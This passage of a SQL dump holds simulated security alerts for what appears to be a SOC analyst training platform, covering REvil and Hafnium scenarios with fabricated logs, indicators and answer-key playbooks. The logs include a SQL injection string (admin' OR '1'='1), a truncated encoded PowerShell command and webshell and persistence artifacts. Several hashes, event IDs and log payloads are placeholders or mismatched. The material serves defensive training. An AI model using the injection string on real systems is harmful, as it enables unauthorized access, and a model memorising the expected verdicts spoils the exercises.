'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(859, 'Lateral Movement Detected - Hafnium Operation', 'high', 'Network traffic analysis', 'Observed lateral movement activity consistent with Hafnium APT group tactics. A compromised internal host was used to authenticate to multiple devices using stolen credentials. Data exfiltration attempts were detected targeting files typically associated with sensitive defense information.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"success\":true,\"action\":\"login\",\"file_accessed\":\"/srv/data/defense_project.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"SMB\",\"description\":\"User jdoe successfully authenticated from internal IP 192.168.1.105 to host 10.0.0.15 and accessed sensitive file defense_project.zip. Network traffic originates from known malicious IP 203.0.113.76, suggesting possible credential compromise.\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in unauthorized access attempts\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(860, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System', 'Initial access was achieved by exploiting a vulnerability in Kaseya VSA, allowing REvil to infiltrate managed service providers\' networks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T15:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vulnerability_exploited\":\"Kaseya VSA zero-day\",\"malware_hash\":\"a3f5e2b1c3d4e5f678901234567890ab\",\"filename\":\"kaseya_vsa_exploit.exe\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-site.com/exploit\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address of compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5e2b1c3d4e5f678901234567890ab\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-site.com/exploit\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"URL hosting exploit payload for Kaseya VSA.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(861, 'Malicious Script Execution on Endpoint', 'high', 'Endpoint Detection and Response', 'Upon gaining access, REvil executed malicious scripts to deploy ransomware across affected systems, encrypting vital data.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"process\":\"powershell.exe\",\"script_name\":\"encrypt_payload.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\encrypt_payload.ps1\",\"severity\":\"High\",\"event_id\":\"4625\",\"description\":\"Malicious script executed by powershell.exe\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypt_payload.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used to deploy ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Username of compromised account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(862, 'Persistence Mechanism Identified', 'high', 'System Logs', 'REvil used sophisticated persistence techniques, embedding themselves within the network to maintain access and control.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"4625\",\"source_ip\":\"198.51.100.23\",\"internal_ip\":\"192.168.1.25\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\malicious.exe\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"Registry modification detected\",\"logon_type\":\"Interactive\",\"description\":\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil command and control infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable used by REvil for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known REvil payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised as part of the REvil attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.525Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"Registry modification detected\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"description\\\":\\\"Persistence mechanism identified by modification of registry run key to execute malicious.exe at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(863, 'Unauthorized Access to Internal Systems', 'high', 'User Activity Monitoring', 'During the investigation, it was discovered that the attackers moved laterally across the network, infecting numerous systems with ransomware. This movement was likely enabled by exploiting credentials of a compromised user account, spreading to multiple internal systems to maximize the attack\'s impact.', 'Lateral Movement', 'T1570', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"action\":\"login\",\"status\":\"success\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"ransomware_payload.exe\",\"internal_ip\":\"192.168.1.15\",\"description\":\"Successful login from external IP to internal system with known malware file transfer\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal system targeted by lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware variant\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File associated with ransomware activity\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised during attack\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.526Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login\\\",\\\"status\\\":\\\"success\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"description\\\":\\\"Successful login from external IP to internal system with known malware file transfer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(864, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention System', 'In the final stage, REvil exfiltrated critical data, threatening its release unless the $70 million ransom demand was met, before the decryption keys were eventually acquired.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T13:45:30Z\",\"event_id\":\"DLP-EXFIL-20231005\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.220.101.42\",\"filename\":\"financial_report_2023.xlsx\",\"user\":\"jdoe\",\"hash\":\"3f9d9f8a7a8f4b9d7b9d8f9d7f9d8f7e\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"status\":\"Success\"}', '2026-01-15 00:50:29', '2026-02-16 17:57:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.220.101.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with REvil operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP system\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file flagged for unauthorized 